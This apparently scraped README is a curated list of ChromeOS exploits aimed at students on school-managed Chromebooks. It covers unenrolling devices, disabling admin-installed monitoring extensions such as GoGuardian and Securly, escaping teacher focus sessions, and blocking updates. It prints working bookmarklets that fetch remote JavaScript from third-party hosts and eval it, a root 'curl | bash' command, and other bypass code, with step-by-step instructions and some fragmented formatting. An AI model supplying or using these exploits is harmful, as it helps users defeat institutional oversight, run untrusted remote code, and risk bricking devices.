This is a curated list of exploits for ChromeOS. It started with LTBEEF, and now there is more! Many of these exploits can destroy your computer if misused. So PLEASE, PLEASE make sure you follow these instructions very carefully!
Need help? Ask for help here!
Please use these only when you have permission, I (3kh0) do not condone the use of any exploits for illegal purposes!
Image Credit: LittleMissNyan
Thank you to all of the contributors! Yall really are pretty epic :D
Table of contents generated with readme-toc
CryptoSmite is an exploit capable of completely unenrolling enterprise-managed Chromebooks. It was found by FWSmasher and released on March 9th, 2024.
This exploit has been patched since Chrome OS 120.
If you’re on v120 or higher, you need to downgrade in order to use CryptoSmite. To do this, you first need to check your kernver=
in Recovery Mode.
kernver=
linekernver=
ends with a 2!
Congratulations, you can downgrade to v119 or lower! Follow the instructions at Downgrading Change versions on how to downgrade.
kernver=
ends with a 3!
Sorry, you can’t downgrade to v119 or lower. Wait for a new unenrollment exploit or do a dangerous hardware modification.
Enter
.Y
then press enter, and it’ll automatically reboot upon completion.CTRL + ALT + E
on the Wi-Fi screen.
SH1MMER is an exploit capable of completely unenrolling enterprise-managed Chromebooks. It was found by the Mercury Workshop team and was released on January, Friday the 13th, 2023.
Due to the detail this exploit requires, please check out the offical website: sh1mmer.me
This exploit has been patched since Chrome OS 111.
Mercury Workshop received a notice from Google™️ that they had to take down their builder and shims. Currently, it is being rehosted by multiple community members.
An exploit that allows for access to sites outside of the Hapara Focus Session
You teacher may be able to still see your screen, but they won’t think you are doing anything wrong because of the focus session.
YOU MUST NEED data: LINKS ALLOWED, IF YOU DON’T HAVE THOSE ALLOWED, THIS WILL NOT WORK.
data:text/html,<!DOCTYPE html> <html> <head> <title>full screen iframe</title> <style type="text/css"> html { overflow: auto; } html, body, div, iframe { margin: 0px; padding: 0px; height: 100%; border: none; } iframe { display: block; width: 100%; border: none; overflow-y: auto; overflow-x: hidden; } </style> </head> <body> <iframe src="https://www.google.com.au" frameborder="0" marginheight="0" marginwidth="0" width="100%" height="100%" scrolling="auto" id="google"> </iframe> </body> </html>
An exploit that allows for unrestricted internet access outside of goguardian’s control
Teacher’s can still see your screen, but they can’t block or close any of your tabs.
YOUR TEACHER NEEDS TO HAVE SET A TAB LIMIT. TRY OPENING TONS OF TABS TO CONVINCE THEM TO ENABLE TAB LIMITS.
javascript: window.onbeforeunload = ()=>{return false;}
about:blank
pages.Prevent from creating additional dialogues
.An exploit that allows for browsing within a completely unblocked Chrome browser. It works on ChromeOS 118 and a wide range of previous versions.
Bypassi made a wonderful slideshow for you goofballs to follow and view using any of the links below!
img/skiovox.pdf
LTBEEF (Literally The Best Exploit Ever Found) is an exploit found by Bypassi (Bypassi#7037) in September 2022 and is a great way to disable spyware installed on your Chromebook by your school.
Use either of the two bookmarklets below. The instructions are the same for both.
Please note that this exploit has been patched for quite some time
javascript:fetch(`https://compactcow.com/ltbeef/exploit.js`).then(data=>{data.text().then(text=>{eval(text)})});
javascript:(function () {var a = document.createElement('script');a.src = 'https://cdn.jsdelivr.net/gh/FogNetwork/Ingot/ingot.min.js';document.body.appendChild(a);}())
Formerly named “Locked Mode Hack,” this Chrome OS exploit uses the locked mode feature to soft disable force-enabled extensions on managed accounts (Excluding Hapara Highlights and Read&Write if installed).
This exploit is patched in Chrome OS 111
javascript:(function(){if (location.hostname == "docs.google.com") {document.body.innerHTML = document.body.innerHTML.replace("Locked mode is on", "Are you ready to turn off extensions?%22);%20document.body.innerHTML%20=%20document.body.innerHTML.replace(%22You%20have%20already%20opened%20and%20closed%20this%20quiz.%20Opening%20this%20quiz%20again%20will%20notify%20the%20form%20owner%20by%20email.%22,%20%22This%20will%20reload%20all%20tabs%20in%20your%20browser%22);%20var%20button%20=%20document.getElementById(%27mG61Hd%27);%20button.innerHTML%20=%20button.innerHTML.replace(%22Start%20Quiz%22,%20%22Disable%20Extensions%22);%20button.addEventListener(%27click%27,%20function(event){window.close();})}%20else%20{window.open(%22https://docs.google.com/forms/u/0/d/e/1FAIpQLSf5EYwrSUjmQhBOasMpORZy80eBCYb7qCpEwWNoRPUGyObGMA/startquiz%22);}})()
LoMoH HTML Additional Notes: You must create your link with the button on the page for locked mode to work within your organization/district. If this is patched for you, you will get rickrolled attempting to perform this exploit. This is just a heads-up for those who do happen to read this.
Literally The Meatiest Exploit of All Time
chrome://extensions
, chrome://extensions-internals
, and chrome://process-internals
are all good places to find your extension’s ID (a 32-character lowercase string). You can also do a simple Google search. Once you have your ID, substitute it into the hostname in the URL below:chrome-extension://extensionidhereblahblah/manifest.json
For some filters like Securly, the block screen is already an extension page.
chrome://kill
(B) and chrome://hang
(C).chrome://kill
bookmark (B). The page should crash. You should already have the next step prepared.chrome://hang
(bookmark C) and quickly reload the page while spamming (ideally with the refresh key on your keyboard or ctrl
+R
). You should have reloaded within one or two seconds of killing the page.Exploit made by Bypassi#7037, learn why this works.
I had far too much faith in society when making this page. Some of you skids out there are really, really stupid and also can’t read. So here are the answers to some commonly asked questions.
How do I get an extension ID?
Okay, fair. Extension IDs are leaked in a couple of places. Generally, the best way to get them is to go to extension settings and copy the URL query value.
It says blocked by client?
That’s the message you get when you try to visit a page belonging to an extension that doesn’t exist. The error message (ERR_BLOCKED_BY_CLIENT
) is highly misleading. Nobody blocked it. You need to find the correct extension ID (see above).
If you got this because you tried to visit the extension_id_here
example URL, you should be extremely ashamed of yourself. Please change and grow as a person.
I don’t have a bookmarks bar!!!!
First, try running ctrl+shift+B. If that doesn’t work, go to chrome://settings
and turn on the “home button” feature, then set it to chrome://hang
. A home icon in the top left should appear to the right of your refresh icon. Use that instead of bookmark C.
There is a version where you don’t need bookmarklets, but I am currently gatekeeping it (L). Check this site daily to see if new alternate instructions have been posted.
I disabled an extension, but now I can’t load websites!
If you just read the write-up, you’d know this would happen if the extension’s background page loaded and its listeners were already initialized before you used chrome://hang
. You can double-check whether the extension is listening using chrome://extensions-internals
, assuming you have a few brain cells in your head.
Anyway, no listeners mean you were too slow. Either you waited more than three seconds between bookmark B and reloading the page, or you needed to be spamming bookmark C faster. The most reliable fix is to restart your computer and try again. Try to match the pace of the gif below: (note the reload)
The bookmarks don’t do anything when I click them!
Might be admin-blocked. Either be smart enough to figure out another way or check this site daily to see if new alternate instructions have been posted.
I disabled the extension. Why is some stuff still blocked?
I have bad news for you… not all filters are Chrome Extensions. Again, make sure the extension pages (like bookmark A) are frozen before you assume that your skiddy self successfully did the exploit.
Close everything and you’re good to go. If it didn’t work, try adjusting the number of open tabs. This is the LTMEAT Flood Method, and also unofficially called Alternate Method # 2. Enjoy a much longer life of LTMEAT!
Not working? Ensure you open a large set, but not too large, of extension tabs (_/generated_background_page.html or /manifest.json) for a permanent freeze.
A method of using LTMEAT that does not require chrome://
URLs. This works by using 80-150 tabs to soak up memory.
chrome://extensions/?id=extension_id_here
and name it Kill switch
.spam.js
. Next, paste this link into your browser: chrome-extension://extension_id_here/background.js
Add Page
. Press Enter.Bookmark Manager
. You should see your page. Click on it and hit Ctrl
+C
. Press Ctrl
+V
until you have 38 of them.Open All (38)
.This page is taking too long
popup appears. This will take 30-60 seconds. If it doesn’t, do chrome://restart
and go back to step 2. Add 3-4 more pages to the folder.Duplicate
. Then, go to your Kill switch
bookmark and look for a switch to flip, Allow Access to File:// urls
. Then, click on the leftmost extension tab (one that opened from the main.js folder) and click Close all tabs to the right
. KEEP THIS TAB OPEN!!!Tips: Go to chrome://settings/performance
and turn Memory Saver off, and in the box where it says Keep these sites always active
, paste in the extension URL. I’ve noticed clicking on one of the tabs from the second batch seems to help with reliability.
BABY METHOD FOR THE TECHNOLOGICALLY CHALLENGED.
chrome-extension://extension_id_here
page, then type chrome://hang
in the URL bar of that tab. It should start loading infinitely.chrome://extensions
page for the blocker extension you want to Disable.Allow access to file URLs
, click that switch. If you don’t see any clickable switches, this exploit will not workCtrl
+P
. A print window should show up, with several pages in the top right.chrome://extensions
.Allow access to file URLs
.First, find your extension’s ID. This is a 32-character code found on your extension’s settings page, normally near or at the top.
Then go to chrome-extension://extension_id_here/manifest.json
Credit to Bypassi for the original LTMEAT framework, and to Swordmaster4321 for discovering that pages can be hung with printing.
Dextensify is an exploit that lets you disable most admin-installed Chrome extensions from any webpage. It can be used from regular websites, HTML files, and data URLs.
Go here and follow instructions: Dextensify Main HTML, or download the file here Dextensify.html
Download mirror: ftp.3kh0.net
Made by ading2210
Requirements
chrome://serviceworker-internals
chrome://serviceworker-internals
Inspect
button, and execute the LTBEEF code
chrome.management.setEnabled('extension_id_here',false)
Thanks to Nyaann#3881 for this exploit
Corkey does indeed include power washing the Chromebook, which wipes local data including everything under “My files,” so I suggest you select everything you want to drag and back up to Google Drive if that’s available for your account.
chrome://extensions
, turn on WiFi, and wait for your school’s blocking extension to appear.A bookmarklet capable of installing extensions, for those without an allowlist.
ext-launcher-bookmarklet.js
and save the code as a bookmarklet.This exploit allows you to execute scripts on extension pages, this is a great example of how Chromebooks are a piece of garbage.
newpointblank.js
and save the code as a bookmarklet on your Chromebook.If it says blocked by Chrome, reload (you have to actually have Securly ofc)
If your school updated GoGuardian, this exploit may not work.
This works only for iBoss, and Blocksi, If you don’t have one of these, use New Point Blank.
iBoss: tinyurl.com/byeswamp
Blocksi: tinyurl.com/blockboss
Then bookmark the code below:
javascript:opener.eval(`fetch("https://rounded-boiling-flax.glitch.me/uboss.js").then(data=>{data.text().then(e=>{eval(e)})})`) && close();
If it doesn’t work let us know by creating a discussion, this was made in partnership with akabutnice
and bypassi
.
This exploit keeps your Chromebook downgraded (or on the current version) without automatic updates screwing you over. This exploit was found by Catakang#0987. Using onc files, you can convince your Chromebook that the WiFi that you’re connected to is pay-to-use (like a hotspot using data), and thus it will not check for updates.
chrome://network#state
chrome://network#state
.+
sign next to the WiFi name of each network that you commonly connect your Chromebook to.generate onc
button below the textbox.chrome://network#general
.import ONC
button.Extra notes
This alt exploit keeps your Chromebook downgraded (or on the current version) without automatic updates screwing you over. This exploit was found by MechaXYZ. Using a Chrome flag, you can convince your Chromebook not to automatically update.
chrome://flags
chrome://flags#show-metered-toggle
or search “metered” in chrome://flags
instead.Extra notes
Blank3r is an exploit that allows you to run bookmarklets on privileged pages, such as the Chrome extensions page. This exploit was made with Point Blank as well.
javascript:let shim = false;var ids = prompt("extension ids (comma separated)").split(",");setInterval(()=>{ids.forEach((id)=> opener.chrome.developerPrivate.updateExtensionConfiguration({extensionId: id, fileAccess: shim}));shim = !shim;}, 145);
chrome://extensions
./?id=
.If you close the tab, the exploit will stop working.
Downgrading can be used for several exploits, to get to a version that does not have patches for certain exploits, such as LTBEEF, SH1MMER, or CryptoSmite. This is a built-in feature of ChromeOS.
Please do note that depending on your kernver=
you may not be able to downgrade to certain versions. More info is at the CryptoSmite Unenrollment section.
chrome://version
on the Chromebook you wish to downgrade. If that is blocked try chrome://system/:~:text=CHROMEOS_RELEASE_DESCRIPTION
, and check for your board under Platform
. For me, that would be octopus.ctrl+f
and type in your board.
ctrl
+alt
+e
to skip the “checking for updates” screen.chromeOS User Policy Editor
There are two modes for this, I recommend just using the first one.
shell
sudo su
curl -Ls https://mercuryworkshop.github.io/Pollen/Pollen.sh | bash
alt+vol_up+x
.Disabling RootFS will Soft-Brick your Chromebook when booting back into normal mode.
shell
sudo su
curl -Ls https://mercuryworkshop.github.io/Pollen/RootFS.sh | bash
curl -Ls https://mercuryworkshop.github.io/Pollen/PollenFS.sh | bash
Kill the extension by signing out.
chrome://settings/signOut
.chrome://restart
tinyurl.com/AddSession
or this linkCredit to Zoroark
Shimboot is a collection of scripts for patching a Chrome OS RMA shim to serve as a bootloader for a standard Linux distribution. It allows you to boot a full desktop Debian install on a Chromebook, without needing to unenroll it or modify the firmware.
For more detailed information, please see the project’s README.
Credit to vk6 for this exploit
If your school allows the uBlock Origin chrome extension, then running any bookmarklet is possible.
Find userResourcesLocation
and change it from unset
to https://raw.githubusercontent.com/3kh0/ext-remover/main/ublockExec.js
*##+js(execute_script.js)
From Inglan2
Recently Google cracked down on bookmarklets and now they don’t work (Its based on the DeveloperToolsAvailability policy). I wanted to run scripts still so I started making this, inspired by uBlock Run Run Code On Pages, but with more features, like saving scripts.
[!CAUTION] DO NOT MODIFY ANYTHING ELSE ON THIS PAGE, UNLESS YOU KNOW WHAT YOU ARE DOING (you probably don’t), AS YOU COULD BREAK SOMETHING.
[!TIP] If you mess up, go to the home of settings and at the bottom click reset to default settings
Change
userResourcesLocation unset
to
userResourcesLocation https://inglan2.github.io/uRun/urun.js
[!TIP] It’s down the bottom
- Set a filter to load uRun After closing the advanced settings tab, go to the filters tab and add this:
*##+js(urun.js)
Simply press Ctrl + Shift + ` to open the menu and from there you can run and create scripts. To add a script, press the ➕ button up the top right, and enter the code you would like to add (without the javascript:
part).
QuickView is a universal webview exploit in Chrome OS that utilizes the QuickOffice component extension. This exploit lets you create login windows with arbitrary URLs, thus allowing you to load pages without any extensions.
Go to quickview-exploit.pages.dev and follow the instructions
Visit any of the links below:
Devtools must not be blocked by policy to perform this exploit.
Go to this link and follow instructions
Credit to Coding4Hours
No idea whatsoever how this went through
THIS EXPLOIT WILL NOT WORK FOR YOU IF YOU HAVE ANY OTHER EXTENSION BESIDES GOGUARDIAN
chrome://restart
` to clear cached sites from GoGuardianCredit to akabutnice
This exploit cos removed in “The Great Reformatting of 2023” so I am gonna readd it!!! Thanks a bunch Bill Gates
Do this! Not drugs!
NOTES: sound doesn’t work, a lot of websites are blocked, but its just fun to screw around in it.
(Not really) credit to mundaneunblocking